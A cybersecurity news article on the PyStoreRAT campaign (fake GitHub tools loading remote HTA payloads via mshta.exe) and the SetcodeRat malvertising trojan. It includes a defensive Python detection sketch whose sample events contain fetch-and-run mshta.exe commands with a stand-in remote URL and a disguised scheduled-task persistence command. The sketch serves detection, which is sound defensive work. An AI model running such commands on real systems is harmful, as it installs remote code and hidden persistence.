Fake Dev Tools on GitHub Hide Dangerous PyStoreRAT Malware
New Cyber Attack Uses GitHub to Sneak in Malicious Software
Cybersecurity investigators are sounding the alarm about a sneaky new operation. Attackers are using popular Python code repositories on GitHub—a platform many developers trust—to secretly spread a harmful program called PyStoreRAT.
This isn’t a typical attack. The bad actors are setting up what look like helpful coding tools, often focused on OSINT (Open-Source Intelligence) or utilities for popular technologies like GPT wrappers or decentralized finance (DeFi) bots. However, these repositories are essentially traps.
Morphisec security researcher Yonatan Edri explained that these seemingly innocent code collections contain only a small amount of Python or JavaScript. This tiny bit of code is programmed to do one thing silently: download a dangerous HTML Application (HTA) file from a remote location and execute it using a standard Windows program called mshta.exe. This action kicks off the entire infection process.
The PyStoreRAT: A Highly Flexible Digital Weapon
The PyStoreRAT is a complex piece of malware, described as being “modular” and operating in multiple stages. Once it’s inside a computer, it can run many different types of malicious files, including standard Windows executables (EXE, DLL), scripts (PowerShell, Python, JavaScript), and installation files (MSI, HTA).
As if that weren’t bad enough, PyStoreRAT doesn’t work alone. It acts as a delivery mechanism for a second, even more specialized threat: an information-stealing program known as Rhadamanthys.
The campaign has been active since at least the middle of June 2025. The attackers are clever in how they make their fake tools look legitimate. They heavily promote these repositories on social media platforms like YouTube and X (formerly Twitter) and use underhanded tactics, such as artificially inflating the number of stars and forks the repositories have. This technique, which security experts have linked to the “Stargazers Ghost Network,” makes the repositories look popular and trustworthy on GitHub’s trending lists.

A Veneer of Trust Exploited
To execute their plan, the threat actors either create new GitHub accounts or use old, dormant ones. The most deceptive part of the attack comes later: after a fake tool starts to gain popularity, the attackers add the actual malicious payload hidden within what they label as a “maintenance” commit, usually around October and November. This is a deliberate move to bypass initial scrutiny once the code is already widely accepted.
In many cases, the supposed tools were practically useless, only showing a static menu or performing minimal, non-functional operations. The whole point was to abuse the inherent trust users place in GitHub. Once a victim is tricked into running the initial loader stub, the infection chain starts.
Once the remote HTA file is executed, the full PyStoreRAT malware is deployed. It immediately begins to check the infected computer’s security posture, profiling the system, checking for administrative access, and specifically looking for files related to popular cryptocurrency wallets, including Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
The initial loader stub also contains a check for certain antivirus software. It looks for terms like “Falcon” (referring to CrowdStrike Falcon) or “Reason” (Cybereason or ReasonLabs) to avoid detection. If it finds one of these security products, it changes how it launches the attack by calling mshta.exe through the command prompt (cmd.exe); otherwise, it proceeds with a direct launch.
Final Stages and a Russian Connection
The malware ensures it stays on the infected machine by creating a persistent scheduled task disguised as an NVIDIA application update. In its final stage, the malware establishes contact with an external command server to receive and carry out instructions. The capabilities of the PyStoreRAT at this stage are extensive: it can download and run more executables (like the Rhadamanthys stealer), extract files from ZIP archives, execute malicious DLL files, run raw JavaScript code directly in memory using the eval() function, and install MSI packages. It can also open secondary mshta.exe processes for more remote HTA payloads and execute PowerShell commands. The malware even has the ability to spread to other systems by replacing legitimate documents on removable drives with malicious Windows Shortcut (LNK) files. To cover its tracks, it can delete the scheduled task used for persistence.
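The loader behaviour described above (a script host spawning mshta.exe with a remote HTA, either directly or via cmd.exe, and a scheduled task with an NVIDIA-lookalike name) gives defenders concrete things to hunt for in process-creation telemetry. The following is an added detection sketch written for this article, not code from Morphisec or from the campaign. The events, PIDs, paths and the `example.invalid` URLs are constructed sample records in a Sysmon-like shape; the task name and thresholds are assumptions, not indicators taken from the report.

```python
import re

# Constructed process-creation events (pid, ppid, image, cmdline), written for
# this example. They are not real telemetry and contain no real indicators.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Python312\python.exe", "cmdline": "python.exe osint_tool.py"},
    # Direct launch: the script host itself spawns mshta.exe with a remote HTA.
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    # Indirect launch through cmd.exe (the path the text says the stub takes when an AV product is present).
    {"pid": 400, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c mshta.exe https://example.invalid/a.hta"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/a.hta"},
    # Persistence: a task named like a GPU updater whose action is mshta.exe with a URL (assumed name).
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 10 /tn "NVIDIA Display Update" '
                '/tr "mshta.exe https://example.invalid/a.hta" /f'},
    # Benign: mshta.exe opening a local file from Explorer.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\report.hta"},
    # Benign: a task whose action is a local executable.
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "NvBackup" /tr "C:\Program Files\NVIDIA Corporation\nvupdate.exe" /sc daily'},
]

SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "node.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}  # intermediaries the loader may route through
LOLBINS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path or command-line token."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def task_arg(cmdline, flag):
    """Value of a schtasks flag such as /tn or /tr, quoted or bare ('' if absent)."""
    m = re.search(rf'/{flag}\s+(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def remote_mshta_from_script(event, by_pid, max_hops=2):
    """Flag mshta.exe fetching a remote HTA when a script host sits within
    max_hops ancestors, tolerating one shell (cmd.exe) in between."""
    if basename(event["image"]) != "mshta.exe" or not URL_RE.search(event["cmdline"]):
        return None
    chain = []
    parent = by_pid.get(event["ppid"])
    for _ in range(max_hops):
        if parent is None:
            break
        name = basename(parent["image"])
        chain.append(name)
        if name in SCRIPT_HOSTS:
            return "mshta.exe with remote URL spawned by " + " -> ".join(reversed(chain))
        if name not in SHELLS:
            break
        parent = by_pid.get(parent["ppid"])
    return None


def lolbin_scheduled_task(event):
    """Flag schtasks /create whose action runs a LOLBIN with a URL; note lookalike names."""
    if basename(event["image"]) != "schtasks.exe" or "/create" not in event["cmdline"].lower():
        return None
    name, action = task_arg(event["cmdline"], "tn"), task_arg(event["cmdline"], "tr")
    action_exe = basename(action.split(" ", 1)[0])
    if action_exe in LOLBINS and URL_RE.search(action):
        reason = "scheduled task %r runs %s with a remote URL" % (name, action_exe)
        if "nvidia" in name.lower():
            reason += " (vendor-lookalike name)"
        return reason
    return None


def scan(events):
    """Return [(pid, reason)] for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        for rule in (lambda ev: remote_mshta_from_script(ev, by_pid), lolbin_scheduled_task):
            reason = rule(e)
            if reason:
                hits.append((e["pid"], reason))
    return hits


if __name__ == "__main__":
    for pid, reason in scan(EVENTS):
        print(pid, reason)
```

Run against the sample events, the scan flags PIDs 300, 500 and 600 and leaves the two benign records alone. The parent walk is what keeps the rule useful against the cmd.exe variant: matching on the immediate parent only would miss the evasive launch path the text describes.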
The identity of the attackers remains unknown, but Morphisec has noted the presence of Russian language elements and specific coding patterns, suggesting the group may originate from Eastern Europe. The firm stressed that PyStoreRAT shows a dangerous evolution toward modular, script-based threats that can easily adapt to different security measures. The combination of using Python for delivery, HTA/JS for execution, and logic to evade Falcon and other security solutions allows the malware to gain a silent, early foothold that many security tools might miss until it’s too late.
Another RAT Spreads Via Malvertising: SetcodeRat
Adding to the global threat landscape, Chinese security company QiAnXin has released details about a separate, new Remote Access Trojan called SetcodeRat. This malware appears to be spreading through deceptive online advertisements, a technique known as malvertising, and has been primarily targeting victims in China since October 2025. Hundreds of computers, including those in government and business organizations, have been compromised quickly.
SetcodeRat is designed to be highly specific in its targeting. The malicious installer package first checks the victim’s system language. If it is not Chinese (specifically Mainland China, Hong Kong, Macao, or Taiwan), the program automatically quits. It also terminates if it cannot connect to a specific Bilibili URL.
The malware is disguised as a legitimate installer for popular programs, such as Google Chrome. Once the regional check is passed, the infection moves to the next stage, which involves a DLL-sideloading chain. An executable file launches and loads a malicious DLL file, which ultimately decrypts and runs the embedded SetcodeRat payload. SetcodeRat uses either Telegram or a standard command-and-control (C2) server to receive instructions for data theft. Its full list of capabilities includes logging keystrokes, capturing screenshots, gathering system and network data, manipulating files, and running system commands, enabling a wide-ranging data espionage operation.
